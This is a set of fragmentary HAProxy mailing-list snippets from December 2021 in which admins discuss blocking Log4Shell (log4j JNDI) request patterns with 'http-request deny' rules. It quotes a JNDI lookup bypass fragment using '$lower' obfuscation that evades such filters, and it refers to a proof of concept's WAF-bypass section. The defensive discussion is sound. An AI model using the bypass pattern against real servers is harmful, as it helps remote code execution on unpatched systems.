Hi.
On 14.12.21 10:18, Olivier D wrote:
Hi,
Le lun. 13 déc. 2021 à 19:38, John Lauro mailto:johnala...@gmail.com>> a écrit :
http-request deny deny_status 405 if { url_sub -i "\$\{jndi:" or hdr_sub(user-agent)
-i "\$\{jndi:" }
was not catching the bad traffic. I think the escapes
Hi,
Le lun. 13 déc. 2021 à 19:38, John Lauro a écrit :
> http-request deny deny_status 405 if { url_sub -i "\$\{jndi:" or
> hdr_sub(user-agent) -i "\$\{jndi:" }
> was not catching the bad traffic. I think the escapes were causing issues
> in the matching.
>
> The following did work:
>
ysg>
From: Nicolas CARPi
Sent: Tuesday, 14 December 2021, 10:27
To: Jonathan Matthews
Cc: Olivier D; HAProxy
Subject: Re: Blocking log4j CVE with HAProxy
On 13 Dec, Jonathan Matthews wrote:
> I believe there are string casing operators available, leading to
> options like &
On 13 Dec, Jonathan Matthews wrote:
> I believe there are string casing operators available, leading to
> options like "${j{$lower:N}di:ldap://...;.
Indeed. Maybe this can help, it's the "Bypass WAF" part of the POC[0]:
On Mon, 13 Dec 2021 at 19:51, Valters Jansons wrote:
>
> Is this thread really "on-topic" for HAProxy?
>
> Attempts to mitigate Log4Shell at HAProxy level to me feel similar
> to.. looking at a leaking roof of a house and thinking "I should put
> an umbrella above it, so the leak isn't hit by
Valters,
On 12/13/21 7:51 PM, Valters Jansons wrote:
Is this thread really "on-topic" for HAProxy?
"I want to block specific pattern in a header" certainly is on-topic for
the HAProxy list.
Attempts to mitigate Log4Shell at HAProxy level to me feel similar
to.. looking at a leaking roof
Is this thread really "on-topic" for HAProxy?
Attempts to mitigate Log4Shell at HAProxy level to me feel similar
to.. looking at a leaking roof of a house and thinking "I should put
an umbrella above it, so the leak isn't hit by rain". Generally, it
might work, but it's not something that you can
http-request deny deny_status 405 if { url_sub -i "\$\{jndi:" or
hdr_sub(user-agent) -i "\$\{jndi:" }
was not catching the bad traffic. I think the escapes were causing issues
in the matching.
The following did work:
http-request deny deny_status 405 if { url_sub -i -f
On Mon, 13 Dec 2021 at 12:51, Olivier D wrote:
> If you don't know yet, a CVE was published on friday about library log4j,
> allowing a remote code execution with a crafted HTTP request.
[snip]
> We would like to filter these requests on HAProxy to lower the exposition. At
> peak times, 20% of
On 13.12.21 14:53, Lukas Tribus wrote:
On Mon, 13 Dec 2021 at 14:43, Aleksandar Lazic wrote:
Well I go the other way around.
The application must know what data are allowed, verify the input and if the
input is not valid discard it.´
You clearly did not understand my point so let me try
On Mon, 13 Dec 2021 at 14:43, Aleksandar Lazic wrote:
> Well I go the other way around.
>
> The application must know what data are allowed, verify the input and if the
> input is not valid discard it.´
You clearly did not understand my point so let me try to phrase it differently:
The log4j
On 13.12.21 14:03, Lukas Tribus wrote:
On Mon, 13 Dec 2021 at 13:25, Aleksandar Lazic wrote:
1. Why is a input from out site of the application passed unchecked to the
logging library!
Because you can't predict the future.
When you know that your backend is SQL, you escape what's necessary
On Mon, 13 Dec 2021 at 13:25, Aleksandar Lazic wrote:
> 1. Why is a input from out site of the application passed unchecked to the
> logging library!
Because you can't predict the future.
When you know that your backend is SQL, you escape what's necessary to
avoid SQL injection (or use
On 13.12.21 11:48, Olivier D wrote:
Hello there,
If you don't know yet, a CVE was published on friday about library log4j,
allowing a remote code execution
with a crafted HTTP request.
We would like to filter these requests on HAProxy to lower the exposition. At
peak times, 20% of our web
Hello there,
If you don't know yet, a CVE was published on friday about library log4j,
allowing a remote code execution with a crafted HTTP request.
We would like to filter these requests on HAProxy to lower the exposition.
At peak times, 20% of our web traffic is scanners about this bug !
The
15 matches
Mail list logo